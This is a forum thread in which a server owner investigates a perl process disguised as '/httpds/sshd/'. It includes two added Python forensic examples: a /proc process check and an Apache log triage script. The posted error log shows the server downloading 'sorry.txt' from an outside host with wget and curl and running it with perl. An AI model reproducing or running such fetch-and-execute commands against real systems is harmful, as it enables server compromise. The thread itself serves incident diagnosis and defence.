For a few weeks now my server has slowed down sometimes, and when I log in via SSH I can see that the perl process is eating CPU time. The only solution is to kill those processes one after another (because they resurrect).
I see that this process has been started by Apache, so I'm afraid that it could be a hack attempt.
Code:
# top
13599 apache 25 0 5088 2868 1200 R 97.1 0.3 27:36.12 perl
Code:
# ps aux | grep 13599
apache 13599 52.0 0.2 5088 2868 ? R 14:27 27:44 /httpds/sshd/
Could someone tell me what "/httpds/sshd/" is?
I use ssh and sftp instantly.
I have already disabled the apache perl module.
The OS is: Fedora Core 5 2.6.20-1.2320.fc5
Apache: 2.2.2
PHP: 5.1.6
perl doesn't run like that unless a user most likely runs a script, etc. Sounds to me like you possibly got hacked. I'd say you may want to unplug this machine from the network to do a full investigation. Unless you have something with apache that kicks off a perl script/program, etc.
The problem is I cannot unplug this machine because this is a leased root server.
I saw that webmin also starts some perl processes, but they are not causing this problem, I think.
How can I find out who starts these processes and what "/httpds/sshd/" is?
I'm trying to be very careful with this server. No root access, complicated password, I regularly check the logfiles, but I didn't see anything suspicious.
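An added example, not part of the thread: `top` reporting `perl` while `ps aux` reports `/httpds/sshd/` is what a process looks like after it has overwritten its own argument string, so the check below reads the kernel-maintained `exe` and `cwd` links and the parent PID from `/proc` and compares them with the claimed name. The function names, the sample parent PID 2210 and the paths `/usr/bin/perl` and `/tmp` are constructed for illustration.

```python
import os
import tempfile

def inspect_process(pid, proc_root="/proc"):
    """Compare what a process claims to be (argv) with what the kernel recorded."""
    base = os.path.join(proc_root, str(pid))
    with open(os.path.join(base, "cmdline"), "rb") as f:
        argv = [a.decode(errors="replace") for a in f.read().split(b"\0") if a]
    with open(os.path.join(base, "stat")) as f:
        stat = f.read()
    # stat is "pid (comm) state ppid ..."; comm can contain spaces or ')'.
    comm = stat[stat.index("(") + 1:stat.rindex(")")]
    ppid = int(stat[stat.rindex(")") + 1:].split()[1])
    exe = os.readlink(os.path.join(base, "exe"))   # binary actually executing
    cwd = os.readlink(os.path.join(base, "cwd"))   # directory it was started in
    deleted = exe.endswith(" (deleted)")
    real = os.path.basename(exe[:-len(" (deleted)")] if deleted else exe)
    claimed = os.path.basename(argv[0]) if argv else ""
    return {
        "pid": pid, "ppid": ppid, "comm": comm, "argv": argv,
        "exe": exe, "cwd": cwd,
        # argv is writable by the process itself; the exe link is not.
        # A mismatch is a lead, not proof: symlinked interpreters and
        # daemons that set a process title also differ.
        "argv_mismatch": claimed != real,
        "exe_deleted": deleted,
    }

def build_sample_proc(root, pid=13599):
    """Constructed /proc entry modelled on the ps/top output in the thread."""
    d = os.path.join(root, str(pid))
    os.makedirs(d)
    with open(os.path.join(d, "cmdline"), "wb") as f:
        f.write(b"/httpds/sshd/\0")
    with open(os.path.join(d, "stat"), "w") as f:
        f.write(f"{pid} (perl) R 2210 2210 2210 0 -1 4194304\n")  # ppid assumed
    os.symlink("/usr/bin/perl", os.path.join(d, "exe"))  # assumed path
    os.symlink("/tmp", os.path.join(d, "cwd"))           # assumed path
    return pid

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        pid = build_sample_proc(root)
        for key, value in inspect_process(pid, root).items():
            print(f"{key:14} {value}")
```

Against the real `/proc`, reading another user's `exe` and `cwd` links requires root; the `ppid` value can be fed back into the same function to walk up to the process that spawned it.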
Leased root server? I'd suggest asking the people you lease it from then. But seriously, if there are processes you don't know about or how they start and you are in full control of this server, better start asking questions to your provider.
httpds/sshd sounds to me like some type of web enabled ssh program I would guess. That's why I'd suggest asking the lease provider. Most likely this server of yours could just be a virtual server and they might have programs running to monitor, applications you may not want running, etc.
I cannot ask my provider because this is a root server. This means I have a physical server in their server room. But this is my server, it's not virtual. So this means that they have not installed any programs there, and the only support is for hardware or the network connection.
It seems to be a hack attempt. I saw this in my general apache error logfile:
Code:
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 13685 100 13685 0 0 2267 0 0:00:06 0:00:06 --:--:-- 35000
sh: line 1: 13589 Killed perl sorry.txt
--14:27:07-- http://hakkah.fateback.com/sorry.txt
Resolving hakkah.fateback.com... 216.65.1.200
Connecting to hakkah.fateback.com|216.65.1.200|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13685 (13K) [text/plain]
Saving to: `sorry.txt'
0K .......... ... 100% 37.4K=0.4s
14:27:09 (37.4 KB/s) - `sorry.txt' saved [13685/13685]
sh: fetch: command not found
Can't open perl script "sorry.txt": No such file or directory
sh: fetch: command not found
Can't open perl script "sorry.txt": No such file or directory
--15:20:31-- http://hakkah.fateback.com/sorry.txt
Resolving hakkah.fateback.com... 216.65.1.200
Connecting to hakkah.fateback.com|216.65.1.200|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13685 (13K) [text/plain]
Saving to: `sorry.txt'
0K .......... ... 100% 34.6K=0.4s
15:20:33 (34.6 KB/s) - `sorry.txt' saved [13685/13685]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 13685 100 13685 0 0 16702 0 --:--:-- --:--:-- --:--:-- 32962
[Wed Jan 09 17:55:42 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-f' is not supported and will be ignored.
[Wed Jan 09 17:55:42 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-d' is not supported and will be ignored.
[Wed Jan 09 17:55:48 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-f' is not supported and will be ignored.
[Wed Jan 09 17:55:48 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-d' is not supported and will be ignored.
Can't open perl script "sorry.txt": No such file or directory
[Thu Jan 10 02:39:31 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-f' is not supported and will be ignored.
[Thu Jan 10 02:39:31 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-d' is not supported and will be ignored.
[Thu Jan 10 02:39:32 2008] [error] [client 208.186.169.183] File does not exist: /var/www/sigsiu/html/ebay/zenphoto
[Thu Jan 10 02:39:32 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-f' is not supported and will be ignored.
[Thu Jan 10 02:39:32 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-d' is not supported and will be ignored.
I think that it does not work. But how is it possible if the apache perl module is disabled?
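An added example, not part of the thread: lines in an Apache error log that lack the `[date] [level]` prefix are the stderr of commands run by httpd's child processes, so separating them from Apache's own records surfaces downloader traces like the ones posted above. The sample lines are copied from the post; the rule names and the `triage` and `fetched_urls` functions are this example's own.

```python
import re

# Apache 2.2 error-log records start "[Wed Jan 09 17:55:42 2008] [warn] ...".
APACHE_LINE = re.compile(r"^\[(\w{3} \w{3} [ \d]\d [\d:]{8} \d{4})\] \[(\w+)\]")

# Unstamped lines are stderr from child processes; these rules name the
# kinds seen in the thread's log.
STRAY_RULES = [
    ("wget_fetch", re.compile(r"^--\d{2}:\d{2}:\d{2}--\s+(\S+)")),
    ("wget_saved", re.compile(r"- `([^']+)' saved \[")),
    ("curl_progress", re.compile(r"^\s*% Total\s+% Received")),
    ("missing_tool", re.compile(r"^sh: (\S+): command not found")),
    ("shell_job_killed", re.compile(r"^sh: line \d+:\s+(\d+) Killed\s+(.+)")),
    ("perl_script_missing", re.compile(r'''^Can't open perl script "([^"]+)"''')),
]

def triage(lines):
    """One finding per stray line, with the last Apache timestamp seen before it."""
    findings, last_stamp = [], None
    for number, line in enumerate(lines, 1):
        stamped = APACHE_LINE.match(line)
        if stamped:
            last_stamp = stamped.group(1)
            continue
        for kind, rule in STRAY_RULES:
            hit = rule.search(line)
            if hit:
                findings.append({"line": number, "kind": kind,
                                 "detail": " ".join(hit.groups()),
                                 "after": last_stamp})
                break
    return findings

def fetched_urls(findings):
    """URLs the server itself was made to download (wget banner lines)."""
    return sorted({f["detail"] for f in findings if f["kind"] == "wget_fetch"})

# Lines copied from the error log posted in the thread.
SAMPLE = """\
% Total % Received % Xferd Average Speed Time Time Time Current
sh: line 1: 13589 Killed perl sorry.txt
--14:27:07-- http://hakkah.fateback.com/sorry.txt
14:27:09 (37.4 KB/s) - `sorry.txt' saved [13685/13685]
sh: fetch: command not found
[Wed Jan 09 17:55:48 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-d' is not supported and will be ignored.
Can't open perl script "sorry.txt": No such file or directory
""".splitlines()

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

The `sh:` prefixes show perl being launched as an external command through a shell, which does not involve mod_perl, so disabling that module does not prevent it. Because stray lines carry no date, the `after` field only bounds them by the nearest preceding Apache record; correlate the wget clock times with the access log to find the request that triggered them.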